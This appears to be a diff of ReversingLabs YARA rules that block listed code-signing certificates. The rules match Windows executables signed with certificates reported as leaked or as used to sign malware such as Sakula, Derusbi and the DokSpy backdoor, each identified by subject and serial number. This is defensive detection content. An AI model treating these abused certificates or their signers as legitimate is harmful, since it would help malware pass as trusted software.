-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRO SAT SRL" and pe.signatures [ i ] . serial == "0e:8a:a3:28:af:20:7c:e8:bc:ae:1d:c1:5c:62:61:88" and 1627344000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fuqing Dawu Technology Co.,Ltd." and pe.signatures [ i ] . serial == "4c:0b:2e:9d:2e:f9:09:d1:52:70:d4:dd:7f:a5:a4:a5" and 1372118399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Cfad6Be1D823B4Eacb803B720F525A7D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5E3D76Dc7E273E2F313Fc0775847A2A2 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Sakula and Derusbi malware."
 		author = "ReversingLabs"
-		id = "844e295f-b22f-5eb0-9f98-0d6e574d2954"
+		id = "93707307-a250-526d-a3d4-32ed5d2a63a6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9148-L9166"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d8005774e6011d8198039a6588834cd0b13dd728103b63c3ea8b6e0dc3878f05"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2068-L2084"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b943057fc3e97cfccadb4b8f61289a93b659aacf2a40217fcf519d4882e70708"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11839,21 +36504,21 @@ rule REVERSINGLABS_Cert_Blocklist_Cfad6Be1D823B4Eacb803B720F525A7D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sistema LLC" and ( pe.signatures [ i ] . serial == "00:cf:ad:6b:e1:d8:23:b4:ea:cb:80:3b:72:0f:52:5a:7d" or pe.signatures [ i ] . serial == "cf:ad:6b:e1:d8:23:b4:ea:cb:80:3b:72:0f:52:5a:7d" ) and 1627430400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NexG" and pe.signatures [ i ] . serial == "5e:3d:76:dc:7e:27:3e:2f:31:3f:c0:77:58:47:a2:a2" and 1372723199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Ebcb54B7E0E6410B28610De0743D4Dd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_47D5D5372Bcb1562B4C9F4C2Bdf13587 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Sakula malware."
 		author = "ReversingLabs"
-		id = "84140bbd-23a0-5355-9d1a-918cc93c3352"
+		id = "d888478e-3883-5d9d-a2b3-d59b57409b8d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9168-L9184"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c9444ff9e13192bf300afac12554bc4cc2defb37bb5b57906b6163db378c515a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2086-L2102"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fb4994647a2ed95c73625d90315c9b6deb6fb3b81b4aa6e847b0193f0a76650c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11863,21 +36528,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Ebcb54B7E0E6410B28610De0743D4Dd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SIA \"MWorx\"" and pe.signatures [ i ] . serial == "7e:bc:b5:4b:7e:0e:64:10:b2:86:10:de:07:43:d4:dd" and 1625616000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DTOPTOOLZ Co.,Ltd." and pe.signatures [ i ] . serial == "47:d5:d5:37:2b:cb:15:62:b4:c9:f4:c2:bd:f1:35:87" and 1400803199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_01106Cc293772Ca905A2B6Eff02Bf0F5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Ac10E68F1Ce519E84Ddcd28B11Fa542 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Sakula malware."
 		author = "ReversingLabs"
-		id = "1ec81090-91a1-5019-be91-14f60d6722fc"
+		id = "9cc0e518-84c8-5b23-b8cb-e0e0fe7849bd"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9186-L9202"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "81e19c06de4546a2cee974230ef7aa15291f20f2e6b6f89c9b12107c26836b5e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2104-L2120"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "dac3b6b7609ec1e82afe4f9c6c14e2d32b6f5d8d49c59d6c605f2a94d71bc107"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11887,21 +36552,21 @@ rule REVERSINGLABS_Cert_Blocklist_01106Cc293772Ca905A2B6Eff02Bf0F5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DMR Consulting Ltd." and pe.signatures [ i ] . serial == "01:10:6c:c2:93:77:2c:a9:05:a2:b6:ef:f0:2b:f0:f5" and 1627084800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "U-Tech IT service" and pe.signatures [ i ] . serial == "3a:c1:0e:68:f1:ce:51:9e:84:dd:cd:28:b1:1f:a5:42" and 1420156799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_05Bb162F6Efe852B7Bd4712Fd737A61E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_31062E483E0106B18C982F0053185C36 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Sakula malware."
 		author = "ReversingLabs"
-		id = "82b2198e-140a-54d0-afa8-ad89980c7899"
+		id = "84bce7c1-efba-5a76-8865-dcfcc8e50d41"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9204-L9220"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d2fcbce0826c1478338827376d2c7869e5b38dc6d5e737a2f986600c6f71b1e6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2122-L2138"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e45fc5b4d1b9f5cd35c56aad381e26e30675a9d99747cd318f3c77ea2af0e14a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11911,21 +36576,21 @@ rule REVERSINGLABS_Cert_Blocklist_05Bb162F6Efe852B7Bd4712Fd737A61E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wellpro Impact Solutions Oy" and pe.signatures [ i ] . serial == "05:bb:16:2f:6e:fe:85:2b:7b:d4:71:2f:d7:37:a6:1e" and 1628726400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MICRO DIGITAL INC." and pe.signatures [ i ] . serial == "31:06:2e:48:3e:01:06:b1:8c:98:2f:00:53:18:5c:36" and 1332287999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6171990Ba1C8E71049Ebb296A35Bd160 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_20D0Ee42Fc901E6B3A8Fefe8C1E6087A : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing Sakula malware."
 		author = "ReversingLabs"
-		id = "f81697ca-e49a-5a3d-9e0f-6192159e098b"
+		id = "ba37919a-584b-5ff7-b4d5-5b711cc87b1f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9222-L9238"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e922bb850b7c5c70db80e6a2b99310eac48d3b10b94a7259899facd681916bfa"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2140-L2156"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2225302de1e8fe9f2ad064e19b2b1d9faf90c7cafbebff6ddd0921bf57c5f9e6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11935,21 +36600,21 @@ rule REVERSINGLABS_Cert_Blocklist_6171990Ba1C8E71049Ebb296A35Bd160 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OWLNET LIMITED" and pe.signatures [ i ] . serial == "61:71:99:0b:a1:c8:e7:10:49:eb:b2:96:a3:5b:d1:60" and 1620000000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SJ SYSTEM" and pe.signatures [ i ] . serial == "20:d0:ee:42:fc:90:1e:6b:3a:8f:ef:e8:c1:e6:08:7a" and 1391299199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2114Ca3Bd2Afd63D7Fa29D744992B043 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_127251B32B9A50Bd : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing OSX DokSpy backdoor."
 		author = "ReversingLabs"
-		id = "7d112cb8-a29f-5560-9c3c-cd8891623d96"
+		id = "3581085c-a6e7-571f-8253-f8d9e90e78fc"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9240-L9256"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "241fe5a9f233fa36a665d22b38fd360bee21bc9832c15ac9c9d9b17adc3bb306"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2158-L2174"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8552ce9e9ab8d6b1025ab3c6e7b2485ef855236114c426475fde0b5f2e231ec9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11959,21 +36624,21 @@ rule REVERSINGLABS_Cert_Blocklist_2114Ca3Bd2Afd63D7Fa29D744992B043 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MATCH CONSULTANTS LTD" and pe.signatures [ i ] . serial == "21:14:ca:3b:d2:af:d6:3d:7f:a2:9d:74:49:92:b0:43" and 1625097600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Developer ID Application: Edouard Roulet (W7J9LRHXTG)" and pe.signatures [ i ] . serial == "12:72:51:b3:2b:9a:50:bd" and 1493769599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6Aaa62208A3A78Bfac1443007D031E61 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_48Cad4E6966E22D6 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing OSX DokSpy backdoor."
 		author = "ReversingLabs"
-		id = "dd6dca76-ff5b-51a8-9318-20a88eb44ffb"
+		id = "22d62d7e-3f76-5f6b-a3f1-a6b087fb63e2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9258-L9274"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7ba7f69514230fe636efc0a12fb9ac489a5a80ca1f5bcdb050dd30ee8f69659c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2176-L2192"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7733b8a97d9f3538db04309a2e3f9df6cb64930b0b6f7f241c3e629be2dd7804"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11983,21 +36648,21 @@ rule REVERSINGLABS_Cert_Blocklist_6Aaa62208A3A78Bfac1443007D031E61 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Solar LLC" and pe.signatures [ i ] . serial == "6a:aa:62:20:8a:3a:78:bf:ac:14:43:00:7d:03:1e:61" and 1608163200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Developer ID Application: Seven Muller (FUP9692NN6)" and pe.signatures [ i ] . serial == "48:ca:d4:e6:96:6e:22:d6" and 1492732799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_09450B8F73Ea43E39D2Cdd56049Dbe40 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5E15205F180442Cc6C3C0F03E1A33D9F : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "e6914a29-f6f7-56fc-8606-95666d31cf33"
+		id = "4a0d995a-37df-52a4-a66f-4bc6c290c10a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9276-L9292"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "22b344b8befc00b0154d225603c81c6058399770f54cb6a09d0f7908c5c8188c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2194-L2210"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1ca238b5da4ff9940425c99f55542c931ccdf0ea3b0a2acbf00ffbbb54171ae0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12007,21 +36672,21 @@ rule REVERSINGLABS_Cert_Blocklist_09450B8F73Ea43E39D2Cdd56049Dbe40 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB9\\x9D\\xE6\\xB1\\x9F\\xE5\\xAE\\x8F\\xE5\\x9B\\xBE\\xE6\\x97\\xA0\\xE5\\xBF\\xA7\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "09:45:0b:8f:73:ea:43:e3:9d:2c:dd:56:04:9d:be:40" and 1561602110 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ziber Ltd" and pe.signatures [ i ] . serial == "5e:15:20:5f:18:04:42:cc:6c:3c:0f:03:e1:a3:3d:9f" and 1498607999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Efd9Bd4B4281C6522D96011Df46C9C4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4C8E3B1613F73542F7106F272094Eb23 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "7bd6616b-fef7-56aa-a78a-606601afa4f3"
+		id = "06f79efe-134e-5941-80fe-3b6482ac9668"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9294-L9310"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8f8a5e3457c05c5e70e33041c5b0b971cf8f19313d47055fd760ed17d94c8794"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2212-L2228"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "15c21b783409d904a0b4971dbdcbd0740083d13f3c633ee77c87df46d3aca748"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12031,21 +36696,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Efd9Bd4B4281C6522D96011Df46C9C4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x9B\\xB7\\xE7\\xA5\\x9E\\xEF\\xBC\\x88\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xEF\\xBC\\x89\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0e:fd:9b:d4:b4:28:1c:65:22:d9:60:11:df:46:c9:c4" and 1586249095 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADD Audit" and pe.signatures [ i ] . serial == "4c:8e:3b:16:13:f7:35:42:f7:10:6f:27:20:94:eb:23" and 1472687999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Dd7D4A785990584D8C0837659173272 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2Ce2Bd0Ad3Cfde9Ea73Eec7Ca30400Da : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "d5e3d85b-cc4e-5522-8558-f2703c38c4e6"
+		id = "b7439b38-c8b7-5dcb-8d10-952862ce3465"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9312-L9328"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d18a479f07f2bdb890437e2bcb0213abdfb0eb684cdaf17c5eb0583039f2edb4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2230-L2246"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a879ecd957acd29e8a5bad6c97cd10453ab857949680b522735bd77eb561d2ee"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12055,21 +36720,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Dd7D4A785990584D8C0837659173272 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x9B\\xB7\\xE7\\xA5\\x9E\\xEF\\xBC\\x88\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xEF\\xBC\\x89\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0d:d7:d4:a7:85:99:05:84:d8:c0:83:76:59:17:32:72" and 1586249095 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Media Lid" and pe.signatures [ i ] . serial == "2c:e2:bd:0a:d3:cf:de:9e:a7:3e:ec:7c:a3:04:00:da" and 1493337599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0C59D46580F039Af2C4Ab6Ba0Ffed197 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Fbc30Db127A536C34D7A0Fa81B48193 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "969e05a1-8ae1-5ea6-9607-5bf164f34e7b"
+		id = "c755a6c1-e113-5513-9a61-87bf6d7dcb3e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9330-L9346"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "32eea2a436f386ef44a00ef72be8be7d4070b02f84ba71c7ee1ca407fddce8ec"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2248-L2264"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6b109b5636aa297a6e07f9d9213f7f07a7767b58442d03dc2f34f8a9b3eaba2b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12079,21 +36744,21 @@ rule REVERSINGLABS_Cert_Blocklist_0C59D46580F039Af2C4Ab6Ba0Ffed197 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xA4\\xA7\\xE8\\xBF\\x9E\\xE7\\xBA\\xB5\\xE6\\xA2\\xA6\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "0c:59:d4:65:80:f0:39:af:2c:4a:b6:ba:0f:fe:d1:97" and 1585108595 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Megabit, OOO" and pe.signatures [ i ] . serial == "0f:bc:30:db:12:7a:53:6c:34:d7:a0:fa:81:b4:81:93" and 1466121599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0448Ec8D26597F99912138500Cc41C1B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_08448Bd6Ee9105Ae31228Ea5Fe496F63 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "0c306a1f-e810-5988-a44c-964b6a67c918"
+		id = "489ffe25-43cf-55b6-b249-17d251b9774e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L9348-L9364"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "001556c31cfb0d94978adc48dc0d24c83666512348c65508975cc9e1a119aeae"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2266-L2282"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9bc044b4fdf381274a2c31bc997dcdfd553595d92de7b33dc472353a00011711"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12103,21 +36768,21 @@ rule REVERSINGLABS_Cert_Blocklist_0448Ec8D26597F99912138500Cc41C1B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xA4\\xA7\\xE8\\xBF\\x9E\\xE7\\xBA\\xB5\\xE6\\xA2\\xA6\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "04:48:ec:8d:26:59:7f:99:91:21:38:50:0c:c4:1c:1b" and 1585108595 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Raffaele Carnacina" and pe.signatures [ i ] . serial == "08:44:8b:d6:ee:91:05:ae:31:22:8e:a5:fe:49:6f:63" and 1445212799 <= pe.signatures [ i ] . not_after )
 }
 
